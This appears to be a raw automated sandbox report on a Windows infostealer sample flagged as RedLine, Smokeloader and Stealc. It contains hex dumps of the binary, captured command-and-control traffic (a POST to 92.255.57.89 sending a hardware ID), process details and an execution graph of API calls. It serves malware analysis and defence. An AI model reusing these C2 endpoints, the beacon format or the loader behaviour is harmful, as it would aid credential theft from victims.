                                                            Data Ascii: MPQ YYeEE}uPEE3@eEO{)xU(xhCthCphClhC5hhC=dhCfhCfhCf`hCf\hCf%XhCf-ThChCE|hCEhCEhCgChC|gCpgCt
                                                            Dec 11, 2024 06:57:02.574976921 CET1236INData Raw: 5e 8b 4d 0c 8b 71 04 3b 71 08 75 3b be 00 00 00 80 83 fb 20 73 17 8b cb d3 ee f7 d6 21 74 b8 44 fe 4c 03 04 75 21 8b 4d 08 21 31 eb 1a 8d 4b e0 d3 ee f7 d6 21 b4 b8 c4 00 00 00 fe 4c 03 04 75 06 8b 4d 08 21 71 04 8b 4d 0c 8b 71 08 8b 49 04 89 4e
                                                            Data Ascii: ^Mq;qu; s!tDLu!M!1K!LuM!qMqINMqINu]}u;MYN^qNqN;Nu`LML s%}uMDD)}uJMYJ
                                                            Dec 11, 2024 06:57:02.574990988 CET896INData Raw: 59 04 3b 59 08 75 57 8a 4c 07 04 88 4d 13 fe c1 88 4c 07 04 83 ff 20 73 1c 80 7d 13 00 75 0e 8b cf bb 00 00 00 80 d3 eb 8b 4d 08 09 19 8d 44 90 44 8b cf eb 20 80 7d 13 00 75 10 8d 4f e0 bb 00 00 00 80 d3 eb 8b 4d 08 09 59 04 8d 84 90 c4 00 00 00
                                                            Data Ascii: Y;YuWLML s}uMDD }uOMYOUMD2LUFBD2<38/])uNK\3uN]K?vj?^EuN?vj?^O;OuB st!\Du#M
                                                            Dec 11, 2024 06:57:02.575001955 CET1236INData Raw: 88 44 fe 0f 75 33 8b 4d ec 8b 5d 08 21 0b eb 2c 8d 4f e0 d3 eb 8b 4d fc 8d 8c 88 c4 00 00 00 8d 7c 38 04 f7 d3 21 19 fe 0f 89 5d ec 75 0b 8b 5d 08 8b 4d ec 21 4b 04 eb 03 8b 5d 08 83 7d f8 00 8b 4a 08 8b 7a 04 89 79 04 8b 4a 04 8b 7a 08 89 79 08
                                                            Data Ascii: Du3M]!,OM|8!]u]M!K]}JzyJzyMyJzQJQJ;Ju^LM L}#}u;M|D)}uN{MN7MtLMuN
                                                            Dec 11, 2024 06:57:02.575014114 CET1236INData Raw: e8 5b f1 ff ff 59 c3 6a 08 e8 78 f0 ff ff 59 c3 8b ff 55 8b ec 56 8b f0 eb 0b 8b 06 85 c0 74 02 ff d0 83 c6 04 3b 75 08 72 f0 5e 5d c3 8b ff 55 8b ec 56 8b 75 08 33 c0 eb 0f 85 c0 75 10 8b 0e 85 c9 74 02 ff d1 83 c6 04 3b 75 0c 72 ec 5e 5d c3 8b
                                                            Data Ascii: [YjxYUVt;ur^]UVu3ut;ur^]U=P$CthP$C/YtuP$CYU hChtCYYuBhQ>@lC$pCc=YthYtjjj3]jh&CvjwYe3C9
                                                            Dec 11, 2024 06:57:02.575025082 CET1236INData Raw: ff 74 17 50 ff 35 6c 43 43 00 ff d6 ff d0 85 c0 74 08 8b 80 f8 01 00 00 eb 27 be ac 17 43 00 56 ff 15 2c 10 43 00 85 c0 75 0b 56 e8 5e fa ff ff 59 85 c0 74 18 68 9c 17 43 00 50 ff 15 4c 10 43 00 85 c0 74 08 ff 75 08 ff d0 89 45 08 8b 45 08 5e 5d
                                                            Data Ascii: tP5lCCt'CV,CuV^YthCPLCtuEE^]jYUV5lCC5Ct!hCCtP5lCCt'CV,CuVYthCPLCtuEE^]CV5lCCCu5@oC
                                                            Dec 11, 2024 06:57:02.575253010 CET1236INData Raw: a3 3c 6f 43 00 e8 03 fb ff ff ff 35 44 6f 43 00 a3 40 6f 43 00 e8 f3 fa ff ff ff 35 48 6f 43 00 a3 44 6f 43 00 e8 e3 fa ff ff 83 c4 10 a3 48 6f 43 00 e8 05 e6 ff ff 85 c0 74 65 68 3e 2e 40 00 ff 35 3c 6f 43 00 e8 3d fb ff ff 59 ff d0 a3 68 43 43
                                                            Data Ascii: <oC5DoC@oC5HoCDoCHoCteh>.@5<oC=YhCCtHhjYYt4V5hCC5DoCYtjVYYCN3@3_^UVW3u'Yu'9LoCvVC;LoCvu_^]U
                                                            Dec 11, 2024 06:57:02.575265884 CET1236INData Raw: 8b 45 f4 83 60 70 fd 33 c0 5b 5f 5e c9 c3 8b ff 55 8b ec 33 c0 50 ff 75 10 ff 75 0c ff 75 08 39 05 a0 70 43 00 75 07 68 e0 44 43 00 eb 01 50 e8 ab fd ff ff 83 c4 14 5d c3 8b ff 55 8b ec 8b 45 08 8b 00 81 38 63 73 6d e0 75 2a 83 78 10 03 75 24 8b
                                                            Data Ascii: E`p3[_^U3Puuu9pCuhDCP]UE8csmu*xu$@= t=!t="t=@u3]h]5@C3UQQVFV\|CCW}S99tk;rk;s99u3tX]u3u`
                                                            Dec 11, 2024 06:57:02.695890903 CET1236INData Raw: 75 05 e8 d9 1d 00 00 68 04 01 00 00 be 50 6f 43 00 56 53 88 1d 54 70 43 00 ff 15 f0 10 43 00 a1 d4 a0 80 00 89 35 0c 6c 43 00 3b c3 74 07 89 45 fc 38 18 75 03 89 75 fc 8b 55 fc 8d 45 f8 50 53 53 8d 7d f4 e8 0a fe ff ff 8b 45 f8 83 c4 0c 3d ff ff
                                                            Data Ascii: uhPoCVSTpCC5lC;tE8uuUEPSS}E=?sJMsB;r6PY;t)UEPWV}EHkC5kC3_^[UXpCSV5 CW33;u.;tXpC#CxujXXpCXpC


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            1192.168.2.44973292.255.57.89807860C:\Users\user\AppData\Local\Temp\1D71.tmp.exe
                                                            TimestampBytes transferredDirectionData
                                                            Dec 11, 2024 06:57:06.076244116 CET87OUTGET / HTTP/1.1
                                                            Host: 92.255.57.89
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                            Dec 11, 2024 06:57:07.405625105 CET203INHTTP/1.1 200 OK
                                                            Date: Wed, 11 Dec 2024 05:57:07 GMT
                                                            Server: Apache/2.4.58 (Ubuntu)
                                                            Content-Length: 0
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Dec 11, 2024 06:57:07.408164978 CET413OUTPOST /45c616e921a794b8.php HTTP/1.1
                                                            Content-Type: multipart/form-data; boundary=----AKKKECBKKECGCAAAEHJK
                                                            Host: 92.255.57.89
                                                            Content-Length: 214
                                                            Connection: Keep-Alive
                                                            Cache-Control: no-cache
                                                            Data Raw: 2d 2d 2d 2d 2d 2d 41 4b 4b 4b 45 43 42 4b 4b 45 43 47 43 41 41 41 45 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 42 36 31 43 44 42 32 37 43 41 35 43 33 36 31 35 30 33 30 31 31 36 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 4b 45 43 42 4b 4b 45 43 47 43 41 41 41 45 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 4b 45 43 42 4b 4b 45 43 47 43 41 41 41 45 48 4a 4b 2d 2d 0d 0a
                                                            Data Ascii: ------AKKKECBKKECGCAAAEHJKContent-Disposition: form-data; name="hwid"B61CDB27CA5C3615030116------AKKKECBKKECGCAAAEHJKContent-Disposition: form-data; name="build"default------AKKKECBKKECGCAAAEHJK--
                                                            Dec 11, 2024 06:57:07.855370998 CET210INHTTP/1.1 200 OK
                                                            Date: Wed, 11 Dec 2024 05:57:07 GMT
                                                            Server: Apache/2.4.58 (Ubuntu)
                                                            Content-Length: 8
                                                            Keep-Alive: timeout=5, max=99
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 59 6d 78 76 59 32 73 3d
                                                            Data Ascii: YmxvY2s=


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.449730172.67.179.2074437732C:\Users\user\Desktop\SEejSLAS9f.exe
                                                            TimestampBytes transferredDirectionData
                                                            2024-12-11 05:57:00 UTC90OUTGET /track_prt.php?sub=0&cc=DE HTTP/1.1
                                                            User-Agent: ShareScreen
                                                            Host: post-to-me.com
                                                            2024-12-11 05:57:00 UTC804INHTTP/1.1 200 OK
                                                            Date: Wed, 11 Dec 2024 05:57:00 GMT
                                                            Content-Type: text/html
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            X-Powered-By: PHP/5.4.16
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eBDrpGNn7I6sU0AQGa52djSvssy2RT3yQT8Xm%2Bx2KdsMgXK775N6wK%2Bycvoj62PCaPdeKWzir4oUhiz%2BD4HmppfBCgl0NnyB43udF2%2FuYrM4dehVxC%2BRYugKnLuOSzdO3A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f033c15bfd072a5-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1959&min_rtt=1955&rtt_var=743&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2833&recv_bytes=728&delivery_rate=1464393&cwnd=203&unsent_bytes=0&cid=4393b748273fa659&ts=653&x=0"
                                                            2024-12-11 05:57:00 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                            Data Ascii: 2ok
                                                            2024-12-11 05:57:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Click to jump to process

                                                            Click to jump to process

                                                            Click to dive into process behavior distribution

                                                            Click to jump to process

                                                            Target ID:0
                                                            Start time:00:56:54
                                                            Start date:11/12/2024
                                                            Path:C:\Users\user\Desktop\SEejSLAS9f.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\SEejSLAS9f.exe"
                                                            Imagebase:0x400000
                                                            File size:428'544 bytes
                                                            MD5 hash:F538D845B52F9D902EE451636D79DF4D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.4093473645.00000000008DD000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                            Reputation:low
                                                            Has exited:false

                                                            Target ID:1
                                                            Start time:00:57:03
                                                            Start date:11/12/2024
                                                            Path:C:\Users\user\AppData\Local\Temp\1D71.tmp.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\AppData\Local\Temp\1D71.tmp.exe"
                                                            Imagebase:0x400000
                                                            File size:304'128 bytes
                                                            MD5 hash:9D773E345DCA0487C5654A92E6340BAA
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000001.00000002.2242131092.00000000009ED000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000001.00000002.2242147064.0000000000A0C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000001.00000003.1742443251.00000000024B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                            Antivirus matches:
                                                            • Detection: 100%, Joe Sandbox ML
                                                            • Detection: 47%, ReversingLabs
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:7
                                                            Start time:00:57:33
                                                            Start date:11/12/2024
                                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7860 -s 1296
                                                            Imagebase:0xb20000
                                                            File size:483'680 bytes
                                                            MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Reset < >

                                                              Execution Graph

                                                              Execution Coverage:2.3%
                                                              Dynamic/Decrypted Code Coverage:3.8%
                                                              Signature Coverage:5.8%
                                                              Total number of Nodes:737
                                                              Total number of Limit Nodes:20
                                                              execution_graph 63584 402c04 InternetOpenW 63585 402e55 63584->63585 63588 402c37 ___scrt_fastfail 63584->63588 63605 40f8cf 63585->63605 63587 402e64 63596 42defd 63588->63596 63591 42defd std::_Locinfo::_Locinfo_ctor 26 API calls 63592 402e17 63591->63592 63593 42defd std::_Locinfo::_Locinfo_ctor 26 API calls 63592->63593 63594 402e29 InternetOpenUrlW 63593->63594 63594->63585 63595 402e44 InternetCloseHandle InternetCloseHandle 63594->63595 63595->63585 63597 42df1a 63596->63597 63600 42df0c 63596->63600 63612 42eac9 20 API calls __dosmaperr 63597->63612 63599 42df24 63613 42a59d 26 API calls _Deallocate 63599->63613 63600->63597 63603 42df4a 63600->63603 63602 402e09 63602->63591 63603->63602 63614 42eac9 20 API calls __dosmaperr 63603->63614 63606 40f8d8 63605->63606 63607 40f8da IsProcessorFeaturePresent 63605->63607 63606->63587 63609 40f94d 63607->63609 63615 40f911 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 63609->63615 63611 40fa30 63611->63587 63612->63599 63613->63602 63614->63599 63615->63611 63616 40fc06 63617 40fc12 BuildCatchObjectHelperInternal 63616->63617 63645 40fff3 63617->63645 63619 40fc19 63620 40fd6c 63619->63620 63623 40fc43 63619->63623 63666 4104d3 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 63620->63666 63622 40fd73 63667 42ffc9 28 API calls _Atexit 63622->63667 63634 40fc82 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 63623->63634 63660 42fcee 5 API calls __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 63623->63660 63625 40fd79 63668 42ff7b 28 API calls _Atexit 63625->63668 63628 40fc5c 63630 40fc62 63628->63630 63661 42fc92 5 API calls __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 63628->63661 63629 40fd81 63632 40fce3 63656 4105ed 63632->63656 63634->63632 63662 42a366 167 API calls 4 library calls 63634->63662 63636 40fce9 63637 40fcfe 63636->63637 63663 410623 GetModuleHandleW 63637->63663 63639 40fd05 63639->63622 63640 40fd09 63639->63640 63641 40fd12 63640->63641 63664 42ff6c 28 API calls _Atexit 63640->63664 63665 410182 13 API calls 2 library calls 63641->63665 63644 40fd1a 63644->63630 63646 40fffc 63645->63646 63669 41077b IsProcessorFeaturePresent 63646->63669 63648 410008 63670 428827 10 API calls 3 library calls 63648->63670 63650 41000d 63651 410011 63650->63651 63671 4317a1 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 63650->63671 63651->63619 63653 41001a 63654 410028 63653->63654 63672 428850 8 API calls 3 library calls 63653->63672 63654->63619 63673 426830 63656->63673 63659 410613 63659->63636 63660->63628 63661->63634 63662->63632 63663->63639 63664->63641 63665->63644 63666->63622 63667->63625 63668->63629 63669->63648 63670->63650 63671->63653 63672->63651 63674 410600 GetStartupInfoW 63673->63674 63674->63659 63675 432785 63680 432553 63675->63680 63678 4327ad 63685 43257e 63680->63685 63682 432771 63699 42a59d 26 API calls _Deallocate 63682->63699 63684 4326d0 63684->63678 63692 43d01c 63684->63692 63688 4326c7 63685->63688 63695 43c8ce 170 API calls 2 library calls 63685->63695 63687 432711 63687->63688 63696 43c8ce 170 API calls 2 library calls 63687->63696 63688->63684 63698 42eac9 20 API calls __dosmaperr 63688->63698 63690 432730 63690->63688 63697 43c8ce 170 API calls 2 library calls 63690->63697 63700 43c9f1 63692->63700 63694 43d037 63694->63678 63695->63687 63696->63690 63697->63688 63698->63682 63699->63684 63703 43c9fd BuildCatchObjectHelperInternal 63700->63703 63701 43ca0b 63718 42eac9 20 API calls __dosmaperr 63701->63718 63703->63701 63704 43ca44 63703->63704 63711 43cfcb 63704->63711 63705 43ca10 63719 42a59d 26 API calls _Deallocate 63705->63719 63710 43ca1a __fread_nolock 63710->63694 63721 43f941 63711->63721 63714 43ca68 63720 43ca91 LeaveCriticalSection __wsopen_s 63714->63720 63718->63705 63719->63710 63720->63710 63722 43f964 63721->63722 63723 43f94d 63721->63723 63725 43f983 63722->63725 63726 43f96c 63722->63726 63797 42eac9 20 API calls __dosmaperr 63723->63797 63801 434faa 10 API calls 2 library calls 63725->63801 63799 42eac9 20 API calls __dosmaperr 63726->63799 63727 43f952 63798 42a59d 26 API calls _Deallocate 63727->63798 63730 43f98a MultiByteToWideChar 63733 43f9b9 63730->63733 63734 43f9a9 GetLastError 63730->63734 63732 43f971 63800 42a59d 26 API calls _Deallocate 63732->63800 63803 4336a7 21 API calls 3 library calls 63733->63803 63802 42ea93 20 API calls 3 library calls 63734->63802 63738 43cfe1 63738->63714 63745 43d03c 63738->63745 63739 43f9c1 63740 43f9e9 63739->63740 63741 43f9c8 MultiByteToWideChar 63739->63741 63743 43346a _free 20 API calls 63740->63743 63741->63740 63742 43f9dd GetLastError 63741->63742 63804 42ea93 20 API calls 3 library calls 63742->63804 63743->63738 63746 43d059 63745->63746 63747 43d087 63746->63747 63748 43d06e 63746->63748 63805 43977e 63747->63805 63819 42eab6 20 API calls __dosmaperr 63748->63819 63751 43d073 63820 42eac9 20 API calls __dosmaperr 63751->63820 63752 43d08c 63753 43d095 63752->63753 63754 43d0ac 63752->63754 63821 42eab6 20 API calls __dosmaperr 63753->63821 63818 43cd0a CreateFileW 63754->63818 63758 43d009 63791 43346a 63758->63791 63759 43d09a 63822 42eac9 20 API calls __dosmaperr 63759->63822 63760 43d162 GetFileType 63763 43d1b4 63760->63763 63764 43d16d GetLastError 63760->63764 63762 43d137 GetLastError 63824 42ea93 20 API calls 3 library calls 63762->63824 63827 4396c7 21 API calls 3 library calls 63763->63827 63825 42ea93 20 API calls 3 library calls 63764->63825 63765 43d0e5 63765->63760 63765->63762 63823 43cd0a CreateFileW 63765->63823 63769 43d17b CloseHandle 63769->63751 63772 43d1a4 63769->63772 63771 43d12a 63771->63760 63771->63762 63826 42eac9 20 API calls __dosmaperr 63772->63826 63773 43d1d5 63775 43d221 63773->63775 63828 43cf1b 169 API calls 4 library calls 63773->63828 63780 43d24e 63775->63780 63829 43cabd 167 API calls 4 library calls 63775->63829 63776 43d1a9 63776->63751 63779 43d247 63779->63780 63781 43d25f 63779->63781 63830 4335cd 29 API calls 2 library calls 63780->63830 63781->63758 63783 43d2dd CloseHandle 63781->63783 63831 43cd0a CreateFileW 63783->63831 63785 43d308 63786 43d312 GetLastError 63785->63786 63787 43d257 63785->63787 63832 42ea93 20 API calls 3 library calls 63786->63832 63787->63758 63789 43d31e 63833 439890 21 API calls 3 library calls 63789->63833 63792 43349e _free 63791->63792 63793 433475 RtlFreeHeap 63791->63793 63792->63714 63793->63792 63794 43348a 63793->63794 63841 42eac9 20 API calls __dosmaperr 63794->63841 63796 433490 GetLastError 63796->63792 63797->63727 63798->63738 63799->63732 63800->63738 63801->63730 63802->63738 63803->63739 63804->63740 63806 43978a BuildCatchObjectHelperInternal 63805->63806 63834 42e3ed EnterCriticalSection 63806->63834 63808 439791 63810 4397b6 63808->63810 63814 439824 EnterCriticalSection 63808->63814 63815 4397d8 63808->63815 63838 43955d 21 API calls 3 library calls 63810->63838 63811 439801 __fread_nolock 63811->63752 63813 4397bb 63813->63815 63839 4396a4 EnterCriticalSection 63813->63839 63814->63815 63816 439831 LeaveCriticalSection 63814->63816 63835 439887 63815->63835 63816->63808 63818->63765 63819->63751 63820->63758 63821->63759 63822->63751 63823->63771 63824->63751 63825->63769 63826->63776 63827->63773 63828->63775 63829->63779 63830->63787 63831->63785 63832->63789 63833->63787 63834->63808 63840 42e435 LeaveCriticalSection 63835->63840 63837 43988e 63837->63811 63838->63813 63839->63815 63840->63837 63841->63796 63842 43410a 63843 434116 BuildCatchObjectHelperInternal 63842->63843 63844 434122 63843->63844 63845 434139 63843->63845 63876 42eac9 20 API calls __dosmaperr 63844->63876 63855 42caff EnterCriticalSection 63845->63855 63848 434127 63877 42a59d 26 API calls _Deallocate 63848->63877 63849 434149 63856 434186 63849->63856 63852 434155 63878 43417c LeaveCriticalSection __fread_nolock 63852->63878 63854 434132 __fread_nolock 63855->63849 63857 434194 63856->63857 63858 4341ae 63856->63858 63889 42eac9 20 API calls __dosmaperr 63857->63889 63879 432908 63858->63879 63861 434199 63890 42a59d 26 API calls _Deallocate 63861->63890 63862 4341b7 63886 4347d3 63862->63886 63866 4342bb 63868 4342c8 63866->63868 63875 43426e 63866->63875 63867 43423f 63869 43425c 63867->63869 63867->63875 63892 42eac9 20 API calls __dosmaperr 63868->63892 63891 43449f 31 API calls 4 library calls 63869->63891 63872 434266 63873 4341a4 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 63872->63873 63873->63852 63875->63873 63893 43431b 30 API calls 2 library calls 63875->63893 63876->63848 63877->63854 63878->63854 63880 432914 63879->63880 63881 432929 63879->63881 63894 42eac9 20 API calls __dosmaperr 63880->63894 63881->63862 63883 432919 63895 42a59d 26 API calls _Deallocate 63883->63895 63885 432924 63885->63862 63896 434650 63886->63896 63888 4341d3 63888->63866 63888->63867 63888->63873 63889->63861 63890->63873 63891->63872 63892->63873 63893->63873 63894->63883 63895->63885 63897 43465c BuildCatchObjectHelperInternal 63896->63897 63898 434664 63897->63898 63899 43467c 63897->63899 63931 42eab6 20 API calls __dosmaperr 63898->63931 63901 434730 63899->63901 63906 4346b4 63899->63906 63936 42eab6 20 API calls __dosmaperr 63901->63936 63902 434669 63932 42eac9 20 API calls __dosmaperr 63902->63932 63905 434735 63937 42eac9 20 API calls __dosmaperr 63905->63937 63921 4396a4 EnterCriticalSection 63906->63921 63909 43473d 63938 42a59d 26 API calls _Deallocate 63909->63938 63910 4346ba 63912 4346f3 63910->63912 63913 4346de 63910->63913 63922 434755 63912->63922 63933 42eac9 20 API calls __dosmaperr 63913->63933 63916 434671 __fread_nolock 63916->63888 63917 4346ee 63935 434728 LeaveCriticalSection __wsopen_s 63917->63935 63918 4346e3 63934 42eab6 20 API calls __dosmaperr 63918->63934 63921->63910 63939 439921 63922->63939 63924 434767 63925 434780 SetFilePointerEx 63924->63925 63926 43476f 63924->63926 63927 434798 GetLastError 63925->63927 63930 434774 63925->63930 63952 42eac9 20 API calls __dosmaperr 63926->63952 63953 42ea93 20 API calls 3 library calls 63927->63953 63930->63917 63931->63902 63932->63916 63933->63918 63934->63917 63935->63916 63936->63905 63937->63909 63938->63916 63940 439943 63939->63940 63941 43992e 63939->63941 63946 439968 63940->63946 63956 42eab6 20 API calls __dosmaperr 63940->63956 63954 42eab6 20 API calls __dosmaperr 63941->63954 63943 439933 63955 42eac9 20 API calls __dosmaperr 63943->63955 63946->63924 63947 439973 63957 42eac9 20 API calls __dosmaperr 63947->63957 63948 43993b 63948->63924 63950 43997b 63958 42a59d 26 API calls _Deallocate 63950->63958 63952->63930 63953->63930 63954->63943 63955->63948 63956->63947 63957->63950 63958->63948 63959 247003c 63960 2470049 63959->63960 63974 2470e0f SetErrorMode SetErrorMode 63960->63974 63965 2470265 63966 24702ce VirtualProtect 63965->63966 63968 247030b 63966->63968 63967 2470439 VirtualFree 63972 24705f4 LoadLibraryA 63967->63972 63973 24704be 63967->63973 63968->63967 63969 24704e3 LoadLibraryA 63969->63973 63971 24708c7 63972->63971 63973->63969 63973->63972 63975 2470223 63974->63975 63976 2470d90 63975->63976 63977 2470dad 63976->63977 63978 2470dbb GetPEB 63977->63978 63979 2470238 VirtualAlloc 63977->63979 63978->63979 63979->63965 63980 8dde26 63981 8dde35 63980->63981 63984 8de5c6 63981->63984 63989 8de5e1 63984->63989 63985 8de5ea CreateToolhelp32Snapshot 63986 8de606 Module32First 63985->63986 63985->63989 63987 8de615 63986->63987 63990 8dde3e 63986->63990 63991 8de285 63987->63991 63989->63985 63989->63986 63992 8de2b0 63991->63992 63993 8de2f9 63992->63993 63994 8de2c1 VirtualAlloc 63992->63994 63993->63993 63994->63993 63995 4332de 63996 433303 63995->63996 63997 4332eb 63995->63997 64001 43335e 63996->64001 64009 4332fb 63996->64009 64047 434ccd 21 API calls 2 library calls 63996->64047 64045 42eac9 20 API calls __dosmaperr 63997->64045 63999 4332f0 64046 42a59d 26 API calls _Deallocate 63999->64046 64003 432908 __fread_nolock 26 API calls 64001->64003 64004 433376 64003->64004 64015 432e16 64004->64015 64006 43337d 64007 432908 __fread_nolock 26 API calls 64006->64007 64006->64009 64008 4333a9 64007->64008 64008->64009 64010 432908 __fread_nolock 26 API calls 64008->64010 64011 4333b7 64010->64011 64011->64009 64012 432908 __fread_nolock 26 API calls 64011->64012 64013 4333c7 64012->64013 64014 432908 __fread_nolock 26 API calls 64013->64014 64014->64009 64016 432e22 BuildCatchObjectHelperInternal 64015->64016 64017 432e42 64016->64017 64018 432e2a 64016->64018 64019 432f08 64017->64019 64024 432e7b 64017->64024 64114 42eab6 20 API calls __dosmaperr 64018->64114 64121 42eab6 20 API calls __dosmaperr 64019->64121 64021 432e2f 64115 42eac9 20 API calls __dosmaperr 64021->64115 64026 432e8a 64024->64026 64027 432e9f 64024->64027 64025 432f0d 64122 42eac9 20 API calls __dosmaperr 64025->64122 64116 42eab6 20 API calls __dosmaperr 64026->64116 64048 4396a4 EnterCriticalSection 64027->64048 64031 432e97 64123 42a59d 26 API calls _Deallocate 64031->64123 64032 432e8f 64117 42eac9 20 API calls __dosmaperr 64032->64117 64033 432ea5 64037 432ec1 64033->64037 64038 432ed6 64033->64038 64035 432e37 __fread_nolock 64035->64006 64118 42eac9 20 API calls __dosmaperr 64037->64118 64049 432f29 64038->64049 64041 432ec6 64119 42eab6 20 API calls __dosmaperr 64041->64119 64042 432ed1 64120 432f00 LeaveCriticalSection __wsopen_s 64042->64120 64045->63999 64046->64009 64047->64001 64048->64033 64050 432f53 64049->64050 64051 432f3b 64049->64051 64053 4332bd 64050->64053 64061 432f98 64050->64061 64133 42eab6 20 API calls __dosmaperr 64051->64133 64151 42eab6 20 API calls __dosmaperr 64053->64151 64054 432f40 64134 42eac9 20 API calls __dosmaperr 64054->64134 64057 4332c2 64152 42eac9 20 API calls __dosmaperr 64057->64152 64058 432f48 64058->64042 64060 432fa3 64135 42eab6 20 API calls __dosmaperr 64060->64135 64061->64058 64061->64060 64066 432fd3 64061->64066 64063 432fb0 64153 42a59d 26 API calls _Deallocate 64063->64153 64064 432fa8 64136 42eac9 20 API calls __dosmaperr 64064->64136 64068 432fec 64066->64068 64069 433012 64066->64069 64070 43302e 64066->64070 64068->64069 64074 432ff9 64068->64074 64137 42eab6 20 API calls __dosmaperr 64069->64137 64140 4336a7 21 API calls 3 library calls 64070->64140 64073 433017 64138 42eac9 20 API calls __dosmaperr 64073->64138 64124 43d365 64074->64124 64075 433045 64080 43346a _free 20 API calls 64075->64080 64078 433197 64081 43320d 64078->64081 64084 4331b0 GetConsoleMode 64078->64084 64079 43301e 64139 42a59d 26 API calls _Deallocate 64079->64139 64083 43304e 64080->64083 64086 433211 ReadFile 64081->64086 64085 43346a _free 20 API calls 64083->64085 64084->64081 64089 4331c1 64084->64089 64090 433055 64085->64090 64087 433285 GetLastError 64086->64087 64088 43322b 64086->64088 64091 433292 64087->64091 64092 4331e9 64087->64092 64088->64087 64093 433202 64088->64093 64089->64086 64094 4331c7 ReadConsoleW 64089->64094 64095 43307a 64090->64095 64096 43305f 64090->64096 64149 42eac9 20 API calls __dosmaperr 64091->64149 64111 433029 __fread_nolock 64092->64111 64146 42ea93 20 API calls 3 library calls 64092->64146 64106 433250 64093->64106 64107 433267 64093->64107 64093->64111 64094->64093 64099 4331e3 GetLastError 64094->64099 64143 4347ee 64095->64143 64141 42eac9 20 API calls __dosmaperr 64096->64141 64099->64092 64100 43346a _free 20 API calls 64100->64058 64102 433297 64150 42eab6 20 API calls __dosmaperr 64102->64150 64104 